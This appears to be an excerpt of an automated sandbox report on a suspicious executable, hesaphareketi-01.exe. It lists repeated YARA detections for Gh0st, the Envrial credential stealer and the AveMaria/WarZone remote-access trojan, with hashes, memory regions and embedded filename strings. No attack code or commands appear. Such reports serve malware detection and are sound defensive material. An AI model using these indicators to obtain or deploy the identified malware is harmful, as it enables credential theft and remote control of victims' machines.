        Source: 17.3.hesaphareketi-01.exe.eca788.5.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 0.2.hesaphareketi-01.exe.3699ae0.5.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 0.2.hesaphareketi-01.exe.3699ae0.5.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 17.3.hesaphareketi-01.exe.eca788.8.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 17.3.hesaphareketi-01.exe.eca788.8.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 0.2.hesaphareketi-01.exe.3659650.4.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 0.2.hesaphareketi-01.exe.3659650.4.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 0.2.hesaphareketi-01.exe.3659650.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 0.2.hesaphareketi-01.exe.3659650.4.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 17.3.hesaphareketi-01.exe.eca788.3.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 17.3.hesaphareketi-01.exe.eca788.3.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 17.3.hesaphareketi-01.exe.eca788.3.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 17.3.hesaphareketi-01.exe.eca788.3.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 17.2.hesaphareketi-01.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 17.2.hesaphareketi-01.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 17.3.hesaphareketi-01.exe.ec8f18.2.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 17.3.hesaphareketi-01.exe.ec8f18.2.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 17.3.hesaphareketi-01.exe.ec4848.11.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 17.3.hesaphareketi-01.exe.ec4848.11.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 17.3.hesaphareketi-01.exe.ec4848.10.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 17.3.hesaphareketi-01.exe.ec4848.10.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 0.2.hesaphareketi-01.exe.26f135c.1.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 0.2.hesaphareketi-01.exe.26f135c.1.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 17.3.hesaphareketi-01.exe.ecbd20.6.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 17.3.hesaphareketi-01.exe.ecbd20.6.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 0.2.hesaphareketi-01.exe.3681670.6.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 0.2.hesaphareketi-01.exe.3681670.6.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 0.2.hesaphareketi-01.exe.3681670.6.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 0.2.hesaphareketi-01.exe.3681670.6.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 17.3.hesaphareketi-01.exe.ecbd20.7.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 17.3.hesaphareketi-01.exe.ecbd20.7.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 17.3.hesaphareketi-01.exe.ec4848.0.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 17.3.hesaphareketi-01.exe.ec4848.0.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 17.3.hesaphareketi-01.exe.ecbd20.1.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 17.3.hesaphareketi-01.exe.ecbd20.1.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 17.3.hesaphareketi-01.exe.eca788.8.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 17.3.hesaphareketi-01.exe.eca788.8.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 0.2.hesaphareketi-01.exe.3681670.6.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 0.2.hesaphareketi-01.exe.3681670.6.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 0.2.hesaphareketi-01.exe.3681670.6.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 0.2.hesaphareketi-01.exe.3681670.6.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 00000011.00000003.375307414.0000000000EC7000.00000004.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 00000011.00000003.375440152.0000000000EC9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 00000011.00000003.375317154.0000000000EC9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 00000000.00000002.372661566.0000000003681000.00000004.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 00000011.00000002.510453136.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 00000011.00000002.510453136.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 00000000.00000002.372473445.00000000026B7000.00000004.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 00000011.00000002.510538676.000000000054F000.00000040.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 00000000.00000002.372592569.0000000003609000.00000004.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 0_2_00DD60100_2_00DD6010
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 0_2_00DD2E680_2_00DD2E68
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 0_2_00DD32980_2_00DD3298
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 0_2_00DD32880_2_00DD3288
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 0_2_00DD2E580_2_00DD2E58
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 0_2_00DD5F110_2_00DD5F11
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exeCode function: 17_3_042142D017_3_042142D0
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exeCode function: 17_3_04246B5017_3_04246B50
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exeCode function: 17_3_04206C0017_3_04206C00
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exeCode function: 17_3_0420BCD017_3_0420BCD0
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exeCode function: 17_3_042104D017_3_042104D0
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exeCode function: 17_3_04206D3017_3_04206D30
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exeCode function: 17_3_04201D3017_3_04201D30
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exeCode function: 17_3_0420466017_3_04204660
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exeCode function: 17_3_04217E7017_3_04217E70
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exeCode function: 17_3_042156B017_3_042156B0
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exeCode function: 17_3_0421872017_3_04218720
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exeCode function: 17_3_0421973017_3_04219730
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exeCode function: 17_3_0421601017_3_04216010
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exeCode function: 17_3_0421D92017_3_0421D920
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exeCode function: String function: 042058A0 appears 81 times
        Source: hesaphareketi-01.exeBinary or memory string: OriginalFilename vs hesaphareketi-01.exe
        Source: hesaphareketi-01.exe, 00000000.00000000.240230672.0000000000322000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameConsoleApp19.exe, vs hesaphareketi-01.exe
        Source: hesaphareketi-01.exe, 00000000.00000002.373581083.0000000005630000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameGppieq.dll" vs hesaphareketi-01.exe
        Source: hesaphareketi-01.exeBinary or memory string: OriginalFilename vs hesaphareketi-01.exe
        Source: hesaphareketi-01.exe, 0000000F.00000002.368976153.00000000001E2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameConsoleApp19.exe, vs hesaphareketi-01.exe
        Source: hesaphareketi-01.exeBinary or memory string: OriginalFilename vs hesaphareketi-01.exe
        Source: hesaphareketi-01.exe, 00000010.00000002.370053945.00000000002D2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameConsoleApp19.exe, vs hesaphareketi-01.exe
        Source: hesaphareketi-01.exeBinary or memory string: OriginalFilename vs hesaphareketi-01.exe
        Source: hesaphareketi-01.exe, 00000011.00000000.370606839.0000000000952000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameConsoleApp19.exe, vs hesaphareketi-01.exe
